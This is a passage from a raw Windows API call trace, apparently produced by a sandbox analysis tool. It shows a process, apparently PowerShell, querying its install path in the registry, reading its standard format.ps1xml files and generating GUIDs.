	[0755.304] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.304] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.304] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.306] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.306] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.307] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.307] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.308] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.308] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.308] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.309] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.312] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.312] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0xbce, lpOverlapped=0x0) returned 1
	[0755.313] ReadFile (in: hFile=0x2dc, lpBuffer=0x333e67e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333e67e*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0755.313] ReadFile (in: hFile=0x2dc, lpBuffer=0x333ef48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x333ef48*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0755.313] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2dc) returned 0x0
	[0755.314] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0755.314] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0755.314] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b3cb2e0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0755.314] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0755.314] RegCloseKey (hKey=0x2dc) returned 0x0
	[0755.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.316] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb5c1758c, Data2=0x6a32, Data3=0x4eaa, Data4=([0]=0x83, [1]=0x40, [2]=0xd7, [3]=0xb4, [4]=0xce, [5]=0x33, [6]=0x41, [7]=0xd8))) returned 0x0
	[0755.316] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4623197d, Data2=0x5ee5, Data3=0x4094, Data4=([0]=0xa0, [1]=0x91, [2]=0x58, [3]=0x2b, [4]=0x22, [5]=0x78, [6]=0x76, [7]=0x2f))) returned 0x0
	[0755.316] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x302aad47, Data2=0x9c53, Data3=0x48c9, Data4=([0]=0xb6, [1]=0x6d, [2]=0x4, [3]=0x36, [4]=0x58, [5]=0xa9, [6]=0x8f, [7]=0x85))) returned 0x0
	[0755.316] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1941cd98, Data2=0x2516, Data3=0x47e6, Data4=([0]=0x8d, [1]=0x66, [2]=0x32, [3]=0x49, [4]=0x7f, [5]=0xf7, [6]=0x4a, [7]=0x5))) returned 0x0
	[0755.316] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2d67ff72, Data2=0xe752, Data3=0x440a, Data4=([0]=0x9a, [1]=0x8a, [2]=0x1c, [3]=0x13, [4]=0x6d, [5]=0x6d, [6]=0xb, [7]=0x77))) returned 0x0
	[0755.317] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x427a86b8, Data2=0xe32c, Data3=0x435d, Data4=([0]=0xae, [1]=0x98, [2]=0x5d, [3]=0x8b, [4]=0x5c, [5]=0x49, [6]=0x12, [7]=0x93))) returned 0x0
	[0755.317] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xeed2b1af, Data2=0x9f24, Data3=0x436f, Data4=([0]=0xbc, [1]=0x8c, [2]=0x46, [3]=0xfa, [4]=0xe7, [5]=0xa, [6]=0x4f, [7]=0x4))) returned 0x0
	[0755.317] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x46fbd172, Data2=0xd4ae, Data3=0x4032, Data4=([0]=0x8d, [1]=0x30, [2]=0x25, [3]=0x5d, [4]=0xb7, [5]=0x95, [6]=0xc5, [7]=0x55))) returned 0x0
	[0755.317] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x734d982, Data2=0x6075, Data3=0x452e, Data4=([0]=0x81, [1]=0x3c, [2]=0x80, [3]=0x28, [4]=0x21, [5]=0x2f, [6]=0x75, [7]=0x44))) returned 0x0
	[0755.317] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x5c69c6ee, Data2=0x235c, Data3=0x4e0d, Data4=([0]=0xa9, [1]=0x96, [2]=0x85, [3]=0x4d, [4]=0xc2, [5]=0x8e, [6]=0x6e, [7]=0xd4))) returned 0x0
	[0755.318] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x9238c0d7, Data2=0x222a, Data3=0x44af, Data4=([0]=0x83, [1]=0xe, [2]=0x8c, [3]=0x9c, [4]=0x4b, [5]=0x39, [6]=0x24, [7]=0x9a))) returned 0x0
	[0755.318] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x6effd91f, Data2=0xa7a2, Data3=0x4bac, Data4=([0]=0x9d, [1]=0x8f, [2]=0xf8, [3]=0x35, [4]=0x91, [5]=0x6f, [6]=0x48, [7]=0xe8))) returned 0x0
	[0755.318] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x56c334a0, Data2=0xfb38, Data3=0x4a25, Data4=([0]=0x82, [1]=0xf0, [2]=0xce, [3]=0xbc, [4]=0xbe, [5]=0x84, [6]=0x3a, [7]=0xfa))) returned 0x0
	[0755.319] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xf480dbac, Data2=0x3b88, Data3=0x4553, Data4=([0]=0x85, [1]=0x48, [2]=0x50, [3]=0xee, [4]=0x26, [5]=0x67, [6]=0xac, [7]=0x5))) returned 0x0
	[0755.319] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x55309baf, Data2=0xb7f7, Data3=0x437a, Data4=([0]=0x8f, [1]=0x99, [2]=0x43, [3]=0x86, [4]=0x51, [5]=0xba, [6]=0x81, [7]=0x25))) returned 0x0
	[0755.319] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xa82b1ca4, Data2=0xeb62, Data3=0x41b7, Data4=([0]=0xac, [1]=0x7f, [2]=0xd2, [3]=0x92, [4]=0xa4, [5]=0xa0, [6]=0xe0, [7]=0x20))) returned 0x0
	[0755.319] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xecc8cfb5, Data2=0xf8e0, Data3=0x4b98, Data4=([0]=0xb1, [1]=0x6b, [2]=0xb7, [3]=0x37, [4]=0x96, [5]=0xa0, [6]=0x47, [7]=0x46))) returned 0x0
	[0755.319] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7eef4157, Data2=0x5170, Data3=0x4a5f, Data4=([0]=0xae, [1]=0x11, [2]=0xee, [3]=0x60, [4]=0xad, [5]=0xc5, [6]=0xf, [7]=0xc))) returned 0x0
	[0755.319] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb75a0644, Data2=0xd83a, Data3=0x40ff, Data4=([0]=0xae, [1]=0xf1, [2]=0xff, [3]=0x52, [4]=0xdb, [5]=0xcb, [6]=0x39, [7]=0xaa))) returned 0x0
	[0755.320] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x27aa0f8f, Data2=0x68a3, Data3=0x410e, Data4=([0]=0xb8, [1]=0x71, [2]=0x6c, [3]=0xaf, [4]=0xc6, [5]=0x39, [6]=0x74, [7]=0xec))) returned 0x0
	[0755.320] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc60b330, Data2=0x7183, Data3=0x44cf, Data4=([0]=0xb3, [1]=0xfa, [2]=0x9a, [3]=0x55, [4]=0x68, [5]=0xc9, [6]=0xbc, [7]=0x8b))) returned 0x0
	[0755.320] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbde42b54, Data2=0xa6ce, Data3=0x4651, Data4=([0]=0xaa, [1]=0xad, [2]=0x39, [3]=0x16, [4]=0xc8, [5]=0xd5, [6]=0xef, [7]=0xaa))) returned 0x0
	[0755.320] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xc60be5a6, Data2=0x2292, Data3=0x49d9, Data4=([0]=0x98, [1]=0xed, [2]=0x50, [3]=0x17, [4]=0x9b, [5]=0x57, [6]=0x44, [7]=0x9d))) returned 0x0
	[0755.321] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xb1e581e3, Data2=0xbf47, Data3=0x4a27, Data4=([0]=0xb1, [1]=0xc5, [2]=0x1c, [3]=0x20, [4]=0x8, [5]=0x91, [6]=0x7f, [7]=0x2c))) returned 0x0
	[0755.321] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x346ecd9c, Data2=0xa805, Data3=0x472b, Data4=([0]=0xac, [1]=0xdb, [2]=0xb8, [3]=0xd0, [4]=0x46, [5]=0x43, [6]=0x73, [7]=0x9b))) returned 0x0
	[0755.321] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe4dbcb20, Data2=0xb79e, Data3=0x4ec7, Data4=([0]=0xb8, [1]=0x8e, [2]=0x40, [3]=0xa8, [4]=0xd4, [5]=0xd, [6]=0xd8, [7]=0x43))) returned 0x0
	[0755.322] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7cda0973, Data2=0x6cb2, Data3=0x43bd, Data4=([0]=0x98, [1]=0x32, [2]=0xbf, [3]=0xce, [4]=0x24, [5]=0x83, [6]=0x81, [7]=0xf1))) returned 0x0
	[0755.323] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x3985df2f, Data2=0x4936, Data3=0x4c4e, Data4=([0]=0x85, [1]=0x8, [2]=0x31, [3]=0x13, [4]=0xfc, [5]=0x36, [6]=0xf9, [7]=0x70))) returned 0x0
	[0755.323] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xbd6277a0, Data2=0xa492, Data3=0x4ead, Data4=([0]=0xa4, [1]=0x8e, [2]=0x75, [3]=0x4c, [4]=0x80, [5]=0x89, [6]=0xb9, [7]=0x95))) returned 0x0
	[0755.324] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x18b4f185, Data2=0xe5b4, Data3=0x425b, Data4=([0]=0xa5, [1]=0x22, [2]=0xb8, [3]=0x77, [4]=0xff, [5]=0x17, [6]=0x9a, [7]=0x10))) returned 0x0
	[0755.324] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x7a63a38a, Data2=0x8894, Data3=0x4f24, Data4=([0]=0x90, [1]=0x63, [2]=0xc5, [3]=0x4, [4]=0x7a, [5]=0x1d, [6]=0x85, [7]=0xc5))) returned 0x0
	[0755.324] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x9d5ce67f, Data2=0x5744, Data3=0x41ad, Data4=([0]=0xb9, [1]=0x56, [2]=0x60, [3]=0xe8, [4]=0xb1, [5]=0x72, [6]=0x61, [7]=0xac))) returned 0x0
	[0755.325] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x2330391, Data2=0xd024, Data3=0x4bc7, Data4=([0]=0xb2, [1]=0xf7, [2]=0x17, [3]=0x72, [4]=0x9d, [5]=0x6b, [6]=0x9, [7]=0x66))) returned 0x0
	[0755.325] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x1e17fb1d, Data2=0x1b6c, Data3=0x426b, Data4=([0]=0xb0, [1]=0xb4, [2]=0x4b, [3]=0xba, [4]=0xdc, [5]=0xf1, [6]=0xd1, [7]=0xe5))) returned 0x0
	[0755.325] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xafd4eab0, Data2=0x6e86, Data3=0x4586, Data4=([0]=0xbb, [1]=0x96, [2]=0xe5, [3]=0xeb, [4]=0x83, [5]=0x27, [6]=0xc7, [7]=0xf0))) returned 0x0
	[0755.326] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xe8137d30, Data2=0xac03, Data3=0x49e4, Data4=([0]=0xb6, [1]=0xb9, [2]=0xd, [3]=0xe8, [4]=0x3c, [5]=0xaf, [6]=0x40, [7]=0x40))) returned 0x0
	[0755.330] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xceda0757, Data2=0x587c, Data3=0x4a66, Data4=([0]=0x96, [1]=0x5b, [2]=0x90, [3]=0x8a, [4]=0x7, [5]=0x3f, [6]=0xa9, [7]=0xeb))) returned 0x0
	[0755.330] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0755.331] GetFileType (hFile=0x2dc) returned 0x1
	[0755.331] SetErrorMode (uMode=0x1) returned 0x1
	[0755.331] GetFileType (hFile=0x2dc) returned 0x1
	[0755.331] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.333] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.334] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.335] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.336] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.337] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0755.337] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x119, lpOverlapped=0x0) returned 1
	[0755.337] ReadFile (in: hFile=0x2dc, lpBuffer=0x344f7c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x344f7c8*, lpNumberOfBytesRead=0x16d418*=0x0, lpOverlapped=0x0) returned 1
	[0755.337] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x2dc) returned 0x0
	[0755.337] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x1, lpData=0x0, lpcbData=0x16d428*=0x56) returned 0x0
	[0755.337] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cb2e0
	[0755.338] RegQueryValueExW (in: hKey=0x2dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3fc, lpData=0x1b3cb2e0, lpcbData=0x16d3f8*=0x56 | out: lpType=0x16d3fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d3f8*=0x56) returned 0x0
	[0755.338] CoTaskMemFree (pv=0x1b3cb2e0) 
	[0755.338] RegCloseKey (hKey=0x2dc) returned 0x0
	[0755.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0755.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0756.742] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x440ba28, Data2=0x96a2, Data3=0x4b9f, Data4=([0]=0xa2, [1]=0xa1, [2]=0x8c, [3]=0xa1, [4]=0xb1, [5]=0xc4, [6]=0x62, [7]=0x18))) returned 0x0
	[0756.742] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0x4be6c672, Data2=0x1fb5, Data3=0x4ba2, Data4=([0]=0x92, [1]=0x40, [2]=0x4d, [3]=0x39, [4]=0xc7, [5]=0xd4, [6]=0x28, [7]=0x4))) returned 0x0
	[0756.742] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xaf81e7a4, Data2=0x591b, Data3=0x43a8, Data4=([0]=0x95, [1]=0xe6, [2]=0x82, [3]=0xa8, [4]=0x19, [5]=0x6c, [6]=0x55, [7]=0x99))) returned 0x0
	[0756.742] CoCreateGuid (in: pguid=0x16d6d0 | out: pguid=0x16d6d0*(Data1=0xcb7d3e57, Data2=0x76d6, Data3=0x4079, Data4=([0]=0x97, [1]=0xec, [2]=0x4f, [3]=0x7d, [4]=0xa5, [5]=0x90, [6]=0x13, [7]=0x7e))) returned 0x0
	[0756.743] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc
	[0756.743] GetFileType (hFile=0x2dc) returned 0x1
	[0756.743] SetErrorMode (uMode=0x1) returned 0x1
	[0756.743] GetFileType (hFile=0x2dc) returned 0x1
	[0756.743] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.744] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.744] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.744] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.744] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.744] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.745] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.745] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.746] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.747] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.747] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.747] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.748] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.748] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.748] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.749] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
	[0756.751] ReadFile (in: hFile=0x2dc, lpBuffer=0x32f01e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d418, lpOverlapped=0x0 | out: lpBuffer=0x32f01e0*, lpNumberOfBytesRead=0x16d418*=0x1000, lpOverlapped=0x0) returned 1
